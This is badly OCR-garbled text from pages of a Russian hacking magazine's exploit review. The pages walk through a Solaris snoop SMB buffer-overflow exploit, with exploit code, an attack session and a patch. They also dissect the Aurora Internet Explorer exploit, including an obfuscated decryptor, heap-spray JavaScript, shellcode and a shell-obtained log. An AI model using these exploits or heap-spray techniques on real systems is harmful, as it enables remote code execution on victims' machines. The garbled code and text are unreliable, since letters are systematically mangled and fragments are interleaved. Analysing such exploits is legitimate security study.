

забывая, что могут до пустить огромные бреши в безопасности при таком 
подходе. На этот разуязвимость связана с обработкой 5МВ-пакетов 

(згс/стб/стб-іпеі/изг.зЬіп/зпооо/зпооо зтЬ.с]. Взглянем на уязвимый 


фрагмент кода: 


06 


збабіс ѵоіб 


07 


іпбегргеб_педргоб (іпб Надз, ис1іаг_б *баба, 
іпб Іеп, скаг *хбга) 


08 


{ 


09 


іпб Іепдбк; 


10 


іпб Ьубесоипб; 


11 


скаг біаіесб [256] ; 


12 




13 


ргобобаба = (исЬаг_б *)баба + 
зІ 2 еоб (збгисб зшЬ) ; 



14 ргобобаба++; /* зкір ѵ^огбсоипб */ 

15 

16 і! (зшЬбаба->11адз & ЗЕКѴЕК_КЕ8РОЫ8Е) { 

17 

18 } еізе { 

19 /* 

20 * гедиезб раскеб : 

21 * зкогб Ьубесоипб; 

22 * збгисб { скаг бшб ; скаг паше [ ] ; } біаіесбз 

23 

2 4 Ьубесоипб = деб2 (ргобобаба) ; 

25 ргобобаба += 2; 

2 6 іб (Надз & Е_ЗІІМ) { 

2 7 ѵтЫІе (Ьубесоипб >1) { 

28 ІепдбЪ. = зргіпбі (біаіесб , 

(скаг * ) ргобобаба+1) ; 

2 9 ргобобаба += ( 1епдбЬ + 2 ) ; 

3 0 Ьубесоипб -= ( 1епдбЬ.+2 ) ; 

31 } 

Обратив внимание на строку 16, можно понять, что, если 5МВ- 
пакет не является ответом сервера, то ветвление перейдет 
на «еізе» условие и механизм по парсингу пакета (д е!2 (] ] . 
Продолжается считывание и заполнение структуры данных 
пакета (27), до метки Р_50М. После чего выполняется копиро- 
вание части элементов управляемого пользователем пакета в 
буфер (сМаІесі] с помощью функции зргіпіП При этом сам буфер 
ограничен всего 256 байтами, а никаких проверок на него не 
производится. 
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ЕХРЮІТ5 

КЕѴІЕѴѴ 








Файл Ораека 8ид Журнал Закладкм Инструменты Справка 



С й- |й ЬІ^!/|ИГ^І^ііп5.ги/пе^/^е5Ь»Ь/()91 1-2,Ні 



Саны* популярные і_] Начальная страница Лента новостей Обрыв автосцепки гг... 



3 Многочисленные уязвимости безо. „ 



Многочисленные 
уяэаимости безопасности 
в ѴѴіге^Нагк 




Епдіізіѵ, 



Зргоху 

Бесплатный прокси-сервер 
с поддержкой ограничений 
по пользователям., 1 Р. 
трансляцией различных 
протоколов (НТТР, РТР. 

50 СК 34 / 45 / 5 ), 
ограниченней полосы 
пропускания и многими 
другими возмолжно стяни. 



ч н ойо сти і статьи / ф орун / пр огр ам мы і р вилам а і поиск / экс пло иты * 



Многочисленные уязвимости безопасности в ѴѴігееІіагк 

Опубликовано' ®26 ноября 2009 г. 

Источник: Сі ВО ОТПАО 

ЗвсіігйуѴиІпз й10436 

©удаленная 
* 5 л-о 

©Многочисленные уязвимости при разборе различных протоколов. 



Тип: 

Опасность: 

Описание: 

Затронутые 

продукты: 

СѴЕ: 



Оригинальный веЕМТ00 
текст 

Обсудить * Прочитать «ли 



вУѴИЁЗНАКК: ѴѴГгввЬагк 1.2 

СѴЕ- 2 Ш 9 -ЗВ 29 {І д оѵе гПоѵу іп иігеІлр/егГ.с іп іЛ'ігеЕІілік Ьеіоіе 1 . 2.2 а I Іоідй 

* гетоіе лМл &е ге (о ехесиів лг&іігліу со <1 е- о г ели» л сіепілі оі зегмісе (лрріівдііап сглФ) 
ѵіл л сглйей егіТііе. геЫегі 1 с л п “и ікідпе 4 іпіедеінглр. ѵчіГпеіаЬіІИу.") 

* СѴЕ- 2009’3561 

* СѴЕ- 2009-3560 

* СѴЕ-20Ш-3549 

СѴЁ~2О09-Э249 (Ми№рІ* Лігеефауіииемлі ЩІП*ГЛЬН№» Іпѵіідсг СЙМ і.0.4 лІФім 
гипьи лнл*<яф ілсЗчй* л па ездечИі ль «и л у ю< 4 і півсѵіа а ..«іьм&о іп(і)Ф* 
гПФйчІс рлглФЫег Іо ділрІѵрЬр; ни ф* (21 гпейиіі «I СЗ>Ті1* рл«лте1е« Іо і п сіу йеЩаъ 
/С'оттолАЦ.х.рЬр, іе лсЬлЫе Фгочдіі то^иІез/Слтр лідпз^СлтрзГдікА8зх.р[ір. 
тс іі и! м/5 ліе іСіігі яГ5 лІезОМе-гАілх.рІі р. т о 4 иІеі/Зугіет/Й-уаІе тА] лх. рьр , 

ІЪО Л и! * */Р (ойин&ГРГСг гічаВА] ЛХ-рЬр . (ПО'СІК I « 9 ^ирІ 0 ЛОЗДір I рл ЛА| (И.рЛр , 
ф тййчкі/СлФЬФага/ВаФѣьлгаАілх.рьр, Фоаиіи/РйШілк/АоФіИілііА^.рйр, 
тд дчкЕ/НоІнг/ИІоІмА^ая.рІН р, ггииіиІеЕ/Рая/Гл^лх'.рІіір, пклІиІк/ОиоІм 
/О и о!е&А[лх.р Нр. то йчІезЛЛІІйі екЛЛіІГІІмАілм.рІі р. т И и!*з/С а I е п 4 а У Асі і ѵі Іу А) л р 1 і р. 
тогіцкі/СлкпіІлі/СлкпсІлсАЗах.рПр. тв^икі/Йи геПа»ОШе і/Йи«Ь ли Оі«І еіА] ах. рЬр , 
Шд 4 чк$ГН дір о С!Ь/Нд I ро *№А| 1 х.рТі р, (П $4 иІ«ДлѴрі<і*ЛііѴАФ*АІ Л>:.рЬр , 
то 4 иі ез/Аси и пЬ/Аос^и пЫѴЦ-ч. рЬ р . Ф Ни I е-^Ко р »іЬГЯ* рдгЬ&і лх р Ьр , 
то сЫ е&'С ®піл с Ь/Со пІаеЬаА] лх. ріір , л п сі тэйиІм/Рс-гІлІ/РогІлЬ^ах.рЬр; лгмЗ лНтм 
іеток лиФепйслІП иіегеіо іпсіо) 

СѴЕ- 2009-3243 (ІІллресІИН ѵи I пе-глЬН Ііу іп Фе ТЦ 5 йгнейФг іп ШігиЬлі 1 3.0 лп 4 

* інлЫчп ічпЫпр оп №п 4 «ие. іИфив г*ток л^ 1 в<К*:« Іо зли» а йопіаі оТмнІео 
Слррііолівоп ОГЛіЬ) «ІЛ чПкЛОѴкЧ) ѴООІРХ Г 0 ІЛ 4 Л іо ИЗ 1.2 еопѵііыіійік.) 

СѴЕ- 2009-3242 (Ш^рооіЯо^ ѵиіломьіиіу іп рл<коі.с т фо овм а кп ф 

* ѴйгвзЬл* 1.2 Л лп 4 12.1 аііоіж гетоіе лЛлоке» Іо олібс а скпілі оілоплое (лррііолііоп 
сілеЬ>ѵіл илКпонп ѵосіоге іеілкіі Ф "лп ипіпШлІігегі Огзеооіоі Кал Л о," жЫсМи^ддек лп 
ляаЛіол ілііѵгс.) 

СѴН- 20 О 9-3241 (ил*р*оИіоіі иѵіпогльіИІу Іп Фо ОроОа (ОйС ПА) 4 Ія* йог іп 

ф ЩЛігоіЬ л йгО . В? .& Фю у дЬ 1.0 .В лп4 1 2,0 ФгочдЬ 1.2.1 аіімвготоіо лИл<К»ііЮ Оіѵ» А 
і яі оТсоплоа (тотогу лпй СРІЛ оопЕіітрІіоо)ѵіл тлІТоітегі ОРСІДА Сапгіоа 
СлІІРечігогІ рл(КеІ 5 .) 

[ бЬЗА 20091 Ѵ05 | ѴѴігееЬвгк: МиІІірСе ѵиІпегаЬіІіТіее ( 26 , 11 , 20 ») 
оставить комментарии к новости (0 комментариев) 



ПОДУМАТЫОЛЬКО, СТОЛЬКО УЯЗВИМОСТЕЙ В СНИФЕРЕ! 



ЕХРЮІТ 



| Рабочий код эксплоита можно скачать здесь — тіІѵѵО 
ехрІоіІз/ 6328 . 

Действия атакующего: 



Устройство самого эксплоита крайне просто! Рассмотрим его главную 
часть, отвечающую за эксплуатацию переполнения буфера. Сначала со- 
здается «сырой» сокет для формирования и инжекта своего пакета в сеть: 



аДДаск : /ехрІоіДз# . /коадіе_зпоор -к 192.168.0.1 

* [*] аккаскіпд ' ЗипОЗ орепзоіагіз 5.11 зпѵ_86 І86рс І386 
І86рс' оп '192.168.0.1' ... 

* [*] ехесике ' ипаше -а > /кшр/ .ракск .уоиг . зузкеш. кхк ' 
почат . . . 

* [ * ] сіопе 
аккаск: /ехріоікз# 

То, что при этом видит администратор системы: 

асЗтіпОорепзоІагіз : ~# зпоор рогк 445 

* Юзіпд йеѵісе рспО (рготізсиоиз тойе) 

* зк[1] : і ? ?ЗМВг : пок коипсі [N 0 зиск кііе ог сіігескогу] 

* ШкЕШШС: гесеіѵесі зідпаі 11 кгот раскек 1 
асІтіп@орепзо1агіз : ~# сак /ктр/ .ракск.уоиг . зузкет. кхк 

* ЗипОЗ орепзоіагіз 5.11 зпѵ_86 І86рс І386 І86рс Зоіагіз 
асІтіп@орепзо1агіз : ~# 



01 з = зоскек (РР_ШЕТ, ЗОСК_КАкГ, ІРРКОТО_ТСР) ; 

02 ік (з == -1) { 

03 ргіпкк ( " [*] каііесі ко сгеаке гаілт зоскек\п" ) ; 

04 } еізе { 

05 зіп . зіп_каші1у = АР_ШЕТ; 

06 зіп.зіп_рогк = ккопз(рогк) ; 

07 зіп . зіп_аск1г . з_асі(іг = іпек_аскіг (кагдек ) ; 

08 

09 ік (’сошшапсі) { 

10 согшпапсі = "ипаше -а > /кшр/ . ракск.уоиг . зузкеш. кхк " ; 

11 } 

12 

13 ргіпкк ("[*] аккаскіпд ' %з ' оп ' %з ' ...\п", 
кагдекз [ ісіх] . сіезсгіркіоп , кагдек) ; 

Далее происходит вставка своей исполняемой на удаленной машине 
команды в буфер, кстати, с помощью безопасной функции зпргіпіТ: 



► 046 



ХАКЕР 03 /134/ 10 





ЕХРШІТ5 

РЕѴІЕѴѴ 



ЕХРЮІТ5 

РЕѴІЕѴѴ 



8МВ Сокптапй Сосіе» 





4 ЬиРРег [ і++] = 8МВ_НЕАБЕК_РІЬЬЕК; 

5 ЬиРРег [і++] = 8МВ_НЕАБЕЕ_ЕІЬЬЕЕ; 



Веіочѵ І5 а ІаЫе §іѵіп& $оте оГЙіе Соге 5 МВ соттаікк 
ТаЫе 3* Соге 8МВ Сотташія 



РіеЫ Наше 


$тЪ_сот 


ЮезсгірЦші 


ЗМВткШг 


0x00 


Сгеаіе <1ігесІогу 


$МБгт<ііг 


0x01 


Беіеіе сйгесіогу 


$МВореп 


0x02 


Ореп Ше 


$МВ сгеаіе 


0x03 


Сгеаіе Ёіе 


ЙМВсІозе 


0x04 


Сіозе Ше 


ЗМВЁшЬ 


0x05 


Соттіі аД Ше$ 


ЗМВшІкк 


0x06 


БеЫе Ше 


ЗМБтѵ 


0x07 


Вепате Ше 


5МВ§еІа(г 


0x08 


Оеі Ёіе айгіЪиІе 


$МВ$еіаІг 


0x09 


8еІ Ше айгіЬиІе 


$МВгеа<і 


0x0 а 


Веа4 Ьуіе Ыоск 


ЗМВѵтІе 


0х0Ь 


^7/ гФе Ьуіе Ыоск 


ЗМВІоск 


0x0 с 


Боек Ьуіе Ыоск 


$МВш1оск 


0x0 <І 


ІТпЬск Ьуіе Ыоск 








ЗМВткпетс 


0х0Г 


Сгеаіе пеш Ёіе 


ВМВсЬкрЙі 


0x10 


СЬеск сіігесіогу 


ЗМВехіІ 


0x11 


Еп<1 оГргосе$$ 


$МВЬеек 


0x12 


Ь$ЕБК 








ЗМВісоп 


0x70 


$1ай еоппесЁоп 


ЗМВісііб 


0x71 


Еп<1 соппесЁоп 


рМВпе^ргоД 


И!В5 





1 /* Перезапись ІепдРЬ */ 

2 ЬиРРег [ і++] = ЗМВ_НЕАВЕП_ЕІВЬЕК; 

3 ЬиРРег [ і++] = ЗМВ_НЕАВЕП_ЕІЕЬЕК; 

4 ЬиРРег [ і++] = ЗМВ_НЕАВЕК_РІВЬЕК; 

5 ЬиРРег [і++] = ЗМВ_НЕАВЕК_ЕІЬВЕК; 



* 4 байта еще */ (к слову, их устанавливает ССС для вы- 
равнивания стека) 



/ 



2 ЬиРРег [ і++] = ЗМВ_НЕАВЕК_РІВЬЕК; 

3 ЬиРРег [і++] = ЗМВ_НЕАВЕК_РІЬЬЕК; 

4 ЬиРРег [і++] = 8МВ_НЕАВЕК_РІЬЬЕК; 

5 ЬиРРег [і++] = 8МВ_НЕАВЕК_ЕІЬЕЕК; 

1 /* Указатель на еЬр */ 

2 ЬиРРег [ і++] = ЗМВ_НЕАВЕК_РІВЬЕК; 

3 ЬиРРег [і++] = 8МВ_НЕАВЕК_РІЬВЕК; 

4 ЬиРРег [ і++] = 8МВ_НЕАВЕК_ЕІЬВЕК; 

5 ЬиРРег [і++] = 8МВ_НЕАВЕК_ЕІЬВЕК; 

1 /* адрес возврата (зузВетО)*/ 

2 ЬиРРег [і++] = ВагдеВз [ іЬх] . аЬЬгезз & ОхРР; 

3 ЬиРРег [і++] = (ВагдеВз [ІЬх] . аЬЬгезз » 8) & ОхРР; 

4 ЬиРРег[і + + ] = (ВагдеВз [ІЬх] . аЬЬгезз » 16) & ОхРР; 

5 ЬиРРег[і++] = (ВагдеВз [ІЬх] . аЬЬгезз » 24) & ОхРР; 

Финал, отправка красоты: 

ргіпВР(" [*] ехесиРе ' %з ' поы согшпапЬ) ; 



зепЬ_зтЬ_раскеВ ( з , &зіп, 8МВ_СОММАВВ_ТКІССЕК, 
ЬиРРег ) ; 

ргіпВР("[*] Ьопе\п"); 
сіозе (з ) ; 



КОДЫ КОМАНД 5МВ — ИМЕННО 0X72 ИСПОЛЬЗУЕТСЯ ПРИ ЭКСПЛУА- 
ТАЦИИ ОПИСАННОЙ УЯЗВИМОСТИ 



01 
02 

03 

04 

05 

06 

07 

08 } 

09 

10 геРигп 0 ; 

11 } 



ТАР6ЕТ5 



5ип Зоіагіз 8/9/10. 
ОрепЗоІагіз < зпѵ_96. 



1 зпргіпРР (ЬиРРег, зі^еоР (ЬиРРег ) , " ;%з;" , 

соттапЬ) ; 

2 

3 /* сЬаг ЬіаІесР [256] */ 

4 Рог (і = зРгІеп (ЬиРРег ) ; і < 256; і + +) { ЬиРРег[і] 

= 5МВ_НЕАВЕК_ЕІЫіЕК; } 

Цикл заполняет буфер сііа ІесР до нужной консистенции по структуре. За- 
тем происходит перезапись нужных адресов за буфером для достижения 
ЕІР и его последующая перезапись на нужный нам адрес возврата: 



50ШТЮЫ 



Патчится это дело заменой небезопасной функции на безопасную — 
БПргІпЬ: 

1 ѵРЬіІе (ЬуВесоипВ > 1) 

{ 

2 - ІепдРЬ = зргіпРР (ЬіаІесР , (сЬаг * ) ргоВоЬаВа+1 ) ; 

3 + ІепдРЬ = зпргіпРР (ЬіаІесР , зігеоР (ЬіаІесР) , 

4 + " % з " , (сЬаг * ) ргоВоЬаВа+1) ; 

5 ргоРоЬаРа += (1епдВЬ+2); 

6 + ІР (ргоРоЬаРа >= ЬаРа+Іеп) 

7 + Ьгеак; 

8 ЬуВесоипВ -= (1епдВЬ+2); 

9 } 



1 /* Перезапись ЬуВесоипВ*/ 

2 ЬиРРег [І++] = ЗМВ_НЕАВЕК_ЕІЬЬЕК; 

3 ЬиРРег [і++] = ЗМВ НЕАВЕК ЕІЬЬЕК; 



ХАКЕР 03 /134/ 10 



► 047 








взлом 



В КОРПОРАТИВНОМ БЛОГЕ бООСЬЕ — ЗАЯВЛЕНИЕ ОБ АТАКЕ НА РЕСУРСЫ 
КОМПАНИИ СО СТОРОНЫ КИТАЯ. ВО ВСЕХ НОВОСТНЫХ ЛЕНТАХ - БУБНЕЖ 
О ПОПЫТКЕ ВЫКРАСТЬ КОНФИДЕНЦИАЛЬНЫЕ ДАННЫЕ У СОТРУДНИКОВ 
600СІ.Е, МСАРЕЕ, АйОВЕ И ЕЩЕ ДВУХ ДЕСЯТКОВ ИЗВЕСТНЫХ КОМПАНИЙ. 

А НАМ ЭТО ПО БАРАБАНУ :). КАКАЯ РАЗНИЦА. НТО ХОТЕЛИ УКРАСТЬ ХАКЕРЫ 
- ГОРАЗДО ИНТЕРЕСНЕЕ РАЗОБРАТЬСЯ. КАК ОНИ ХОТЕЛИ ЭТО СДЕЛАТЬ. 
АПОСКОЛЬКУВ ОСНОВЕ ЛЕЖИТ НОВАЯ УЯЗВИМОСТЬ В ШТЕРШ ЕХРЮРЕР, 
ТО И ЗАЙМЕМСЯ МЫ ТЕМ. НТО ПРЕПАРИРУЕМ РАБОЧИЙ СПЛОИТ. 
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Г лавная задача сплоита — заставить 

браузер обратиться к объекту, который 
ранее был удален. Причем втом месте 
памяти, над которым был получен кон- 
троль и в который удалось поместить 
зловредный код (шелл-код), выполняющий за- 
грузку бэкдора. И если первая цель становится 
доступной из-за ошибки в I Е, то контроль над 
нужным участком памяти достигается благо- 
даря приему Неар Зргауіпд. Онираньшене раз 
использовался в сплоитах для браузера. 



ТЕХНИКА НЕДР 5РКАУШ6 

Чтобы лучше понимать, как работает непо- 
средственно Аврора, предлагаю разобраться 
сначала с приемом Неар Зргауіпд. Тогда код 
сплоита покажется понятным и логичным. 
Указанный прием можно применить, когда 
уязвимая программа (в нашем случае — ІЕ) 
по какой-то причине обращается к несуще- 
ствующему участку памяти, находящемуся в 
адресном пространстве кучи. В то же время 
адрес не должен быть выше 0х7ШШ, потому 
что выше этого адреса находится адресное 
пространство ядра, к которому нет доступа из 
обычного приложения. Это одно из ограниче- 
ний приема Неар Зргауіпд. 

Итак, что мы можем сделать, если приложе- 
ние по какой-то причине обращается к куче 
(по-английски — Неар), но по несуществую- 
щему адресу? Ответ зависит от природы 
уязвимого приложения. Если мы не можем 
управлять кучей приложения (на самом 
деле, максимум, что мы можем делать, это 
неуправляемо инжектировать в нее данные), 
то пиши пропало: ничего не выйдет. И напро- 
тив, если такая возможность имеется, мы 
можем добавлять данные в кучу, выделяя под 
них память, до тех пор, пока невалидный до 
этого момента адрес не начнет существовать. 
Посмотри на иллюстрацию, чтобы все стало 
ясно. 

Впрочем, знание точного адреса, по которому 
передается управление, не дает нам воз- 
можности произвольно вставить шелл-код: 
операционная система сама распределяет 
адресное пространство для выделения дина- 
мической памяти. Так как же поместить в кучу 
шелл-код, чтобы он все-таки выполнился? 
Есть секрет. Мы можем заполнить кучу одина- 
ковыми блоками, которые состоят из после- 



довательности ІЧОР-команд, означающих 
«отсутствие операции», и шелл-кода. Если 
переход будет выполнен на один из таких 
ІЧОР'ов, то выполнение будет «скользить» по 
цепочке ІЧОР до тех пор, пока не наткнется 
на машинную команду, которая выполняет 
некоторые действия. А поскольку после каж- 
дой цепочки ІЧОР'а у нас стоит шелл-код, то 
именно он и будет их выполнять! Заполнение 
подобным образом кучи называется Неар 
Зргауіпд. Другой вопрос: почему он так часто 
используется для эксплуатирования уязвимо- 
стей браузера? Причина в том, что браузер — 
одно из немногих приложений, которое 
может управлять кучей. Реализуется все с 
помощью 35-скриптов, которые выполняются 
на стороне клиента. Может показаться, что 
прием очень простой, но это лишь в теории, а 
практическая реализация во многих случаях 
не так очевидна и требует ухищрений. Так 
или иначе, теперь, когда мы познакомились с 
ключевым подходом, используемым в Аигога, 
можно изучить внутренности самого сплоита 
уже с некоторым знанием дела. 

ДЕОБФУСКАЦИЯ КОДА 

Код нашумевшего сплоита полностью напи- 
сан на ЗаѵаЗсгірІ, но, чтобы немного услож- 
нить его чтение, автор использовал простой 
способ обфускации. Тело страницы, вызы- 
вающей загрузку трояна, начинается с так 
называемого декриптора, — он расшифровы- 
вает незатейливо закодированный 35-код и 
начинает его выполнение. Приведу немного 
урезанный код: 

<зсгірП> 

ѵаг с = сЗоситепП 

ѵаг Ь = "60 105 ... 62 14 10 " 

ѵаг зз = Ь.зр1іП(" "); 

ѵаг а = " а а а . . . I } ~ " 

ѵаг з=а.зр1іП(" "); 

з [ 3 2 ] = " " 

сс = " " 

Ног ( і = 0 ; і<зз . 1епдПЪ-1 ; і + + ) сс + = 
з [зз [і] . ѵаІиеОН ( ) — і%2 ] ; 
ѵаг сЗ = с.ѵигіПе 
(3 (сс) 

</зсгірП> 



С помощью этого кода осуществляется 
расшифровка тела сплоита и его запуск. 
Зашифрованное тело 35-скрипта находится 
в строковой переменной Ь. Каждый символ 
выделяется в отдельный элемент массива, 
после чего с каждым из них в цикле про- 
водятся элементарные преобразования с 
использованием параметров, сохраненных в 
переменной а. В результате, расшифрован- 
ный код сплоита запускается: 

<Ъ.Пт1> 

<зсгірП> 

ѵаг зс = ипезсаре ( " %и9090 [...] 

6%иЬНа8%и00с38 " ) ; 

ѵаг ззз = Аггау(826, 679, [...] 

413, 875); 

ѵаг агг = петл; Аггау; 

Ног (ѵаг і = 0; і < ззз.ІепдПЪ.; 

і ++ ) 

{ 

агг[і] = ЗПгіпд. 

НготСЗіагСосЗе (ззз [і] /7) ; 

} 

ѵаг сс=агг . ПоЗПгіпд ( ) ; сс=сс . 
геріасе ( / , / д, " " ) ; 
сс = сс . геріасе ( /@/д, " , " ) ; 

еѵаі (сс) ; 

ѵаг хі = пем Аггау ( ) ; 

Ног (і = 0; і < 200; і ++ ) { 
хі [ і ] = сЗоситепП . 
сгеаПеЕІетепП ( " СОММЕШ?" ) ; 

х1[і].сЗаПа = " аЬс" ; 

} ; 

ѵаг еі = пиіі; 

НипсНіоп еѵ1(еѵП){ 
еі = сЗоситепП . 
сгеаПеЕѵепПОЬЗесП (еѵН) ; 

сЗоситепП . деПЕІетепПВуІсЗ ( " зрі " ) . 
іппегНТМЬ = " " ; 
міпскж. зеПІпПегѵаІ (еѵ2 , 50); 

} 

НипсНіоп еѵ2 ( ) { 
р = " \и0с0с3\ [...] ХиОсОсЗ" ; 

Ног (і = 0; і < хІ.ІепдПЬ.; і + + 

) 

{ 

хі [і] .сЗаПа = р; 

} ; 

ѵаг П = еі . згсЕІешепП ; 
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О*** * О .*] .2' К У лтк •& РіѴСГІМ е з* «ііаі 

**»«; | ^ К<р://І92. 168.0. 12/гіеоЫик.Киі 



ѵаг пзипеісареСУвиОсО^оиОсОё"). ѵѵЫе(пІеп8іЬ<=524288) п+=п, п=п *иЬ*Ьпп8(0.524269*іс Іеп8іЬ).ѵаг х=псгѵ АігауО. 
Еог(ѵаг і= 04<200 ^И-) (х(і)=п+$с.) 



ДЕОБФУСКАЦИЯ УЧАСТК ^СОД А _ 

- 



■ІІІ 

* 



ВОТ ЗДЕСЬ ІЕ И СХОДИТ С УМА, ПЕРЕДАВАЯ 
УПРАВЛЕНИЕ ПО АДРЕСУ ИЗ РЕГИСТРА ЕСХ 



©•** * О і“) ✓ 5 " гл тй’ лмим €> : • -а Ѳ Л 

М&съ 4ЙЬ«р://І»г. 166.0, 12:3456/ ѵ Д 6о ІгЬ* * 




КРИТИЧЕСКАЯ ОШИБКА ШТЕРЫЕТ ЕХРЮРЕК 

} 

</8СГІрЪ> 

<зрап ісб= " зрі " ><ІМС ЗЕС= " ааа . діі " 
оп1оасІ=" еѵі (еѵепР) "></зрап> 
</Ьосбу></ЬДт1> 



Сразу бросается в глаза переменная зс, в которой нахо- 
дится шелл-код нашего сплоита. Остальная часть сплои- 
та не так очевидна, поэтому пройдемся по исходному 
коду по частям. 

РАЗБИРАЕМ ТЕЛО СПЛОИТА 

В расшифрованном теле сплоита автор еще раз исполь- 
зует обфускацию, расположив часть кода в закодирован- 
ном виде в массиве 555. 

ѵаг ззз = Аггау(826, 679, [...] 413, 875); 

ѵаг агг = пеъг Аггау; 

Ног (ѵаг і = 0; і < ззз . ІепдДЬ.; і ++ ) 

{ 




НТТР://ѴѴѴШ 



■ г 

> Ііпкз 

• Описание старого 
доброго приема ІЧ0Р- 

ЗІІСІе : 

ѵѵѵѵѵѵ.рбгеебопп. 

огд/зоіаг/бопеупеі/ 

зсап20/зсап20.ЫтІ . 

• Описание уязвимо- 
сти от МІСГ050І1: 
ѵѵѵѵѵѵ.ті егозой .сот/ 
ТесбпеТ/зесигіТѵ/ 
ЬиІбеІіп/МЗІ 0-002. 



} 

А вот теперь, вспоминая описание приема Неар Зргауіпд, 
внимательно смотрим на код. Сначала создается пере- 
менная п, в которую записывается большое количество 
ІЧОР-элементов Ой ОС (вернее, их заменителей, не 
выполняющих значимых действий, переходов и вызовов 
процедур]. Далее создается массив из одинаковых эле- 
ментов, образованных слиянием ІЧОР-команд из пере- 
менной п и... шелл-кода из переменной зс. Множество 
одинаковых блочков, для каждого из которых выделяется 
память в куче, — классическая реализация приема Неар 
Зргауіпд! Зачем он нужен, мы определились выше. 

Теперь, когда в кучу приложения инжектированы нужные хаке- 
ру данные, пора разобраться, как взломщику удается передать 
управление на один из тех блочков, для которых только что 
была выделена память. Здесь-то и используется критическая 
ошибка Іпіегпеі Ехріогег, вызывающая такой переход. 

РАЗБИРАЕМ ТЕЛО СПЛОИТА 

Код сплоита далее делает довольно простую вещь: 

ѵаг хі = пем Аггау ( ) ; 

Ног (і =0; і < 200; і ++ ) { 
хі [ і ] = сбосшпепП . сгеаПеЕІетепП ( " СОММЕШ? " ) ; 

х1[і].сбаПа = " аЬс"; 

} ; 

ѵаг еі = пиіі; 

Так создается 200 элементов с лейблом СОММЕІЧТ, а их 
поле .баіа заполняется простой строкой «аЬс». Чтобы не 
забегать вперед, объясним смысл приема позже. По сути, 
все приготовления сплоита на этом этапе закончены, и 
начинается выполнение страницы с загрузки простого 
изображения: 



тзрх . 



агг[і] = ЗПгіпд. НготСбіагСосбе (ззз [і] /7 ) ; 



} 



<зрап іс!= " зрі " ><ІМС ЗКС=" ааа.діН" 



ѵаг сс=агг . ПоЗПгіпд ( ) ; сс=сс . геріасе ( / ,/ д, 



оп1оасб= " еѵі (еѵепП) "></зрап> 







сс = сс . геріасе ( /@/д , " , " ) ; 

еѵаі (сс) ; 



> іпіо 

Информация пред- 
ставлена исклю- 
чительно в ознако- 
мительных целях. 
Использование ее 
в противозаконных 
целях грозит пресле- 
дованием со стороны 
правоохранительных 
органов. Редакция 
в этом случае ответ- 
ственности не несет. 



Для расшифровки опять же используется простейший 
прием: для каждого зашифрованного символа из масси- 
ва ззз в цикле выполняется операция 555[і]/7, после чего 
с помощью функции ІтотСбагСобе получается символ 
по его Ібпісобе-коду. Массив преобразуется в строку сс, 
из которой регеспами удаляются лишние символы, а 
завершающей командой еѵаі(сс) запускается запуск рас- 
шифрованного кода: 

ѵаг п = ипезсаре ( " %и0с0с!%и0с0с1" ) ; 
хУЫІе (п.ІепдПЪ. <= 524288)п += п; 
п = п. зиЬзПгіпд ( 0 , 5242 69 — зс . ІепдПЪ.) ; 
ѵаг х = пеѵѵ Аггау ( ) ; 

Ног (ѵаг і = 0; і < 200; і ++ ) { 



НТМЕ-код определяет тег <зрап>, который содержит тег 
<ітд>, отображающий ааа.дб (без этого файла сплоит не 
сработает). Причем, как только изображение загружает- 
ся, срабатывает обработчик события опіоаб (процедура, 
выполняемая автоматически после события «загрузка 
элемента завершена»), в результате которого запускается 
функция еѵі. Посмотрим, что она собой представляет: 

НипсПіоп еѵі (еѵП) { 

еі = сбосшпепП . сгеаПеЕѵепПОЪб есП (еѵП) ; 

сбосшпепП . деПЕІетепПВуІсб ( " зрі " ) . іппегНТМЬ 

міпсбом. зеПІпПегѵаІ (еѵ2 , 50); 

} 

Функция создает объект-событие на основе события 
еѵепЕ переданного через параметр обработчиком собы- 
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деда™»» 



С :ХН 1№0№Ъуг1ет 32\стгі,ехе 



с іЧТвгаи>ія_а«™га. ру 3456 

М УоЬ іегѵсг іі гиил іпд аС Ыірі/ЛУгЛбЙ .0.12:34^^ 

[-1 I псопігѵд саппссСісп 1 ь-оп 192.168.0.13 
Е-І Зспйілзг схрЛ«і( Іл 1.92.168,9,13 ,, , 

1-1 Екрісіі ЗЕП( [□ 192,168.0.13 

Г - ) I п с оп і п я с оппс с С ів п Іпн 192.160.О.1Э 
[ - 1 бе гѵйіп я схііісК Но 1 92 . 1 68 . б , 1 3 ... 

Е-] ЕмрІліС вепс Сй 192,168,0.13 

[-1 1 псопіпд саппгсеіоп Р і*оп 192,160.0.13 
[-1 ЕиііЛіі=г ахріаіе Іи 192.168.0.13 ... 

[-1 Екіріоіі іепі Со 192 .168.0.13 
[-1 Еміеіпд . . . 

е іЧІега!@>_ 



РЕАЛИЗАЦИЯ СПЛОИТА НАѴГтЖОТЛИЧНО РАБО- 
ТАЕТ! 



ШЕЛЛ ПОЛУЧЕН! 

тия опіоасі тега <ітд>. Дальше идет интересная часть: с помощью 
поля іппегНТМІ_ удаляются все вложенные элементы тега <зрап>. А 
поскольку в нем находится только объект <ітд>, то он и удаляется, 
становясь недействительным. Последняя строчка функции запускает 
таймер, который вызывает другую функцию — еѵ2(] — каждые 50 мил- 
лисекунд. 



присваивает значение полю .сіаіа данными, то этим данным нужно 
место, чтобы быть сохраненными где-то в куче Птеар'е). И догадайся 
— что? Система заново использует память, которая ранее была выде- 
лена для объекта <ітд>! Это значит, что автор сплоита смог переза- 
писать объект <ітд> теми данными, какие он захотел. Теперь ответим 
на вопрос, зачем он использовал для этого ОхОС 0x00? Все просто: 
в результате получается адрес ОхОССЮОССЮ, — по нему находятся 
данные с шелл-кодом, которые мы инжектировали в кучу с помощью 
Неар Бргауіпд'а. То, как происходит переход по следующему адресу, 
объясняет следующая строка сплоита. Код обращается к объекту еі : 



ЕипсЪіоп еѵ2 ( ) { 
р = "ХиОсОсЗЛ [...] ХиОсОс!" ; 

Ног (і = 0; і < хІ.ІепдРЪ.; і ++ ) 

{ 

хі [ і ] . сІаЪа = р ; 

} ; 

ѵаг Р = еі . згсЕІешепР ; 

} 

</зсгірР> 

И вот, перед нами — ядро сплоита! Мы видим цикл, который проходит 
по массиву хі — это тот самый массив, что содержит двести объектов 
СОММЕІЧТ, созданных ранее. Для каждого объекта в цикле запол- 
няется поле .баСа. Взглянув на содержимое переменной р, которой 
заполняется каждый элемент массива хі, можно подумать, что таким 
образом осуществляется дополнительный Неар Бргауіпд. Но так ли 
это? Нет! Если посмотреть внимательно, то размер данных, которые 
присваиваются полю .баСа, фиксирован, и он слишком маленький для 
того, чтобы заполнить кучу. Кроме того, в кучу уже было инжектиро- 
